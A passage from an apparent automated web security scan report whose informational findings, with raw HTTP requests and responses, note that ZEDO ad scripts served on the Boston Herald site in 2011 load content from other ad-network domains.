Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,2,9:826,187,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=12:5:6:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:0:12:5:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:39:45 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=155
Expires: Fri, 28 Jan 2011 22:42:20 GMT
Date: Fri, 28 Jan 2011 22:39:45 GMT
Connection: close
Content-Length: 2306

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

17.177. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.7776881733443588

The response contains the following link to another domain:

http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=26%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=26%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=26%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.7776881733443588 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883605Zc826000187,826000187Zs173Zt128; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:25,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=36:17:15:53:25:27:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,11,14:951,7,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=54:26:36:17:15:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196646,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:18 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Sat, 29 Jan 2011 02:36:02 GMT
Date: Sat, 29 Jan 2011 02:35:18 GMT
Connection: close
Content-Length: 4629

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=26%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=26%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=26%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.178. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4405909504275769

The response contains the following link to another domain:

http://redcated/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.4405909504275769 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZCBC=1; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:14,26,1:14,26,1; PI=h1037004Za883605Zc826000187,826000187Zs173Zt128; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:38,26,1:25,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,11,14:951,7,14:826,187,9:951,2,9:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFad=36:17:15:53:25:27:2:1:1:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=54:28:36:17:15:25:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196647,196646,196644:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196646:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 02:35:19 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=44
Expires: Sat, 29 Jan 2011 02:36:03 GMT
Date: Sat, 29 Jan 2011 02:35:19 GMT
Connection: close
Content-Length: 4616

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='spectrum728x
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856420/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883604%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=28%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=28%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=28%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.179. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.6230065044946969

The response contains the following link to another domain:

http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n

Request

GET /bar/v16-401/d3/jsc/fm.js?c=11/2&a=0&f=&n=951&r=13&d=14&q=&$=&s=2&z=0.6230065044946969 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:951,2,14:826,187,9:951,2,9:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=8:3:0:12:5:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2239

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n"><\/script>
...[SNIP]...

17.180. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3389143997337669

The response contains the following link to another domain:

http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.3389143997337669 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1; FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,2,9:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=16:7:8:3:8:0:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:5,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:826,187,14:951,11,14:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:9:7:8:3:0:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:56:10 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Fri, 28 Jan 2011 22:56:42 GMT
Date: Fri, 28 Jan 2011 22:56:10 GMT
Connection: close
Content-Length: 2304

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n"><\/script>
...[SNIP]...

17.181. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=audiencescience300x250&s=2&z=0.10010791243985295

The response contains the following link to another domain:

http://a.collective-media.net/adj/cm.rev_bostonherald/;sz=300x250;ord=' + Math.random() + '?

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=audiencescience300x250&s=2&z=0.10010791243985295 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
